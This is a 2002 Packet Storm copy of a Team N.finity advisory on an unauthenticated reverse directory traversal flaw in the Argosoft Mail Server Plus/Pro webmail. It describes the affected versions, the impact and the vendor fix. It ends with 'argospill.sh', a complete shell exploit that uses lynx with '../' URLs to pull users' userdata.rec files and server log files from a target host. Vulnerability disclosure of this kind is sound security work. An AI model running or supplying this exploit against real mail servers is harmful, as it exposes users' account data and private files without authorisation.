argospill.sh

2002-07-04T00:00:00
ID PACKETSTORM:26333
Type packetstorm
Reporter Team N.finity
Modified 2002-07-04T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Team N.finity Security Advisory  
03/07/2002  
  
Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal  
  
  
Summary  
===================  
  
Argosoft Mail Server Pro contains a built-in HTTP server for  
webmail access. Without logging in, an attacker can do a  
reverse directory traversal to retrieve any file on the drive  
that System can read by specifying a series of "/.." after the  
path to the images of the webmail server or of the mail  
attachments for a valid user.  
  
  
Systems Affected  
===================  
  
Any Windows system using the webmail feature of Argosoft Mail   
Server Plus / Pro <= 1.8.1.5  
  
The freeware edition of Argosoft Mail Server is not vulnerable.  
  
  
Impact  
===================  
  
An attacker can retrieve any file on the disk readable by  
the mail server. The filename and relative path needs to be  
specified, as directory listings are not generated. Executable  
files are also not run as this is not supported by the webmail.  
  
  
Explanation  
===================  
  
Argosoft Mail Server comes in three versions: Freeware, Plus,  
and Pro. The Plus and Pro versions come with a build-in web  
server to provide simple Webmail access to users' mail.  
  
The webmail server does not check for reverse directory  
traversal. This allows an attacker to exploit the images or  
attachments directory to list the contents of files on the  
drive.  
  
Also, normally, a user will have to log into Argosoft Mail  
Server Pro's webmail in order to read his mail and attachments.  
However, it allows non-authenticated users to retrieve files  
via the attachments URL, as long as a valid path is specified.  
This can be exploited to retrieve the attachments of users in  
certain conditions, or can also be reverse traversed.  
  
While the attachments folder is deleted once the user logs out  
of the webmail or after 20 minutes of inactivity, this exploit  
will work even if the attachments folder is not present.  
  
  
Solution  
===================  
  
The vendor has released a new version at  
http://www.argosoft.com/applications/mailserver/  
  
  
Acknowledgments  
===================  
  
Vulnerability discovery, exploit code, and advisory by Mayhem  
of Team N.finity.  
  
  
Contact Information  
===================  
  
Team N.finity can be reached by mailing to  
nfinity@gmx.net.  
  
  
References  
===================  
  
[1] Team N.finity  
http://nfinity.yoll.net/  
  
  
Disclaimer  
===================  
  
This advisory does not claim to be complete or to be usable for  
any purpose. Information about the vulnerable systems may be  
inaccurate or wrong. Any supplied exploits are not to be used  
for malicious purposes, but for educational purposes only.  
  
This advisory is free for open distribution in unmodified form.  
Articles that are based on information from this advisory  
should include link [1].  
  
  
Exploit Code  
===================  
  
#!/bin/sh  
#  
# released on 06/07/2002 by team n.finity <nfinity@gmx.net>  
# find us at http://nfinity.yoll.net/  
#  
# argospill.sh  
  
HOST=$1  
USER=$2  
DOMAIN=$3  
  
startpro()  
{  
echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"  
URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec  
/usr/bin/lynx -dump http://$HOST$URL  
}  
  
startplus()  
{  
echo -e "\nSpilling user $USER, host $HOST (Plus)\n"  
URL=/$USER/_tempatt/../userdata.rec  
/usr/bin/lynx -dump http://$HOST$URL  
}  
  
startboth()  
{  
echo -e "\nSpilling host $HOST (Plus / Pro)\n"  
URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt  
/usr/bin/lynx -dump http://$HOST$URL  
}  
  
usage()  
{  
echo -e "\nUsage:\n"  
echo "Both - $0 <host>"  
echo "Pro - $0 <host> <user> <domain>"  
echo "Plus - $0 <host> <user>"  
echo -e "\nExample:\n"  
echo "Both, images dir - $0 www.test.com"  
echo "Plus, no dom req - $0 www.test.com me"  
echo "Pro, default dom - $0 www.test.com me _nodomain"  
echo "Pro, virtual dom - $0 www.test.com me test.com"  
}  
  
echo "Argospill 1.0 by Team N.finity"  
  
if [ -n "$HOST" ]; then  
if [ -n "$USER" ]; then  
if [ -n "$DOMAIN" ]; then  
startpro  
else  
startplus  
fi  
else  
startboth  
fi  
else  
usage  
fi  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 7.1.1  
  
iQA/AwUBPSKM3Dqz8mu/KmdVEQIeNQCgtpMG/HZQtgzx+iXSWAhOA+iLJWMAniJQ  
d529X6ix+N9AqAekalpw66ND  
=rJ5I  
-----END PGP SIGNATURE-----  
  
  
`